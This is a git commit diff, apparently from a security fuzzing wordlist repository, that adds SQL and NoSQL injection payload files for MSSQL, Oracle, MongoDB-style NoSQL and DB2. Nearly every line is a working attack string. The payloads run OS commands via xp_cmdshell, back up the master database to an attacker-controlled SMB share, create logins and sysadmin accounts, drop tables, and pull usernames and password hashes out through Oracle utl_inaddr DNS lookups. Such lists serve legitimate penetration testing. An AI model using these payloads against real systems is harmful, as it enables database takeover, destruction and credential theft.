Quick move about
This commit is contained in:
g0tmi1k
15
Fuzzing/Databases/MSSQL-Enumeration.fuzzdb.txt
Normal file
15
Fuzzing/Databases/MSSQL-Enumeration.fuzzdb.txt
Normal file
@@ -0,0 +1,15 @@
|
||||
# ms-sqli info disclosure payload fuzzfile
|
||||
# replace regex with your fuzzer for best results <attackerip> <sharename>
|
||||
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
|
||||
# might need to terminate payloads with ;--
|
||||
select @@version
|
||||
select @@servernamee
|
||||
select @@microsoftversione
|
||||
select * from master..sysserverse
|
||||
select * from sysusers
|
||||
exec master..xp_cmdshell 'ipconfig+/all'
|
||||
exec master..xp_cmdshell 'net+view'
|
||||
exec master..xp_cmdshell 'net+users'
|
||||
exec master..xp_cmdshell 'ping+<attackerip>'
|
||||
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
||||
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp<73>'" select * from myfile"--
|
||||
17
Fuzzing/Databases/MSSQL.fuzzdb.txt
Normal file
17
Fuzzing/Databases/MSSQL.fuzzdb.txt
Normal file
@@ -0,0 +1,17 @@
|
||||
# you will need to customize/modify some of the vaules in the queries for best effect
|
||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||
'create user name identified by 'pass123' --
|
||||
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
||||
' ; drop table temp --
|
||||
'exec sp_addlogin 'name' , 'password' --
|
||||
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
|
||||
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
|
||||
' grant connect to name; grant resource to name; --
|
||||
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
||||
' or 1=1 --
|
||||
' union (select @@version) --
|
||||
' union (select NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
19
Fuzzing/Databases/NoSQL.txt
Normal file
19
Fuzzing/Databases/NoSQL.txt
Normal file
@@ -0,0 +1,19 @@
|
||||
true, $where: '1 == 1'
|
||||
, $where: '1 == 1'
|
||||
$where: '1 == 1'
|
||||
', $where: '1 == 1'
|
||||
1, $where: '1 == 1'
|
||||
{ $ne: 1 }
|
||||
', $or: [ {}, { 'a':'a
|
||||
' } ], $comment:'successful MongoDB injection'
|
||||
db.injection.insert({success:1});
|
||||
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||
|| 1==1
|
||||
' && this.password.match(/.*/)//+%00
|
||||
' && this.passwordzz.match(/.*/)//+%00
|
||||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
[$ne]=1
|
||||
';sleep(5000);
|
||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||
56
Fuzzing/Databases/Oracle.fuzzdb.txt
Normal file
56
Fuzzing/Databases/Oracle.fuzzdb.txt
Normal file
@@ -0,0 +1,56 @@
|
||||
# contains statements from jbrofuzz
|
||||
’ or ‘1’=’1
|
||||
' or '1'='1
|
||||
'||utl_http.request('httP://192.168.1.1/')||'
|
||||
' || myappadmin.adduser('admin', 'newpass') || '
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
|
||||
|
||||
12
Fuzzing/Databases/db2enumeration.fuzzdb.txt
Normal file
12
Fuzzing/Databases/db2enumeration.fuzzdb.txt
Normal file
@@ -0,0 +1,12 @@
|
||||
select versionnumber, version_timestamp from sysibm.sysversions;
|
||||
select user from sysibm.sysdummy1;
|
||||
select session_user from sysibm.sysdummy1;
|
||||
select system_user from sysibm.sysdummy1;
|
||||
select current server from sysibm.sysdummy1;
|
||||
select name from sysibm.systables;
|
||||
select grantee from syscat.dbauth;
|
||||
select * from syscat.tabauth;
|
||||
select * from syscat.dbauth where grantee = current user;
|
||||
select * from syscat.tabauth where grantee = current user;
|
||||
select name, tbname, coltype from sysibm.syscolumns;
|
||||
SELECT schemaname FROM syscat.schemata;
|
||||
Reference in New Issue
Block a user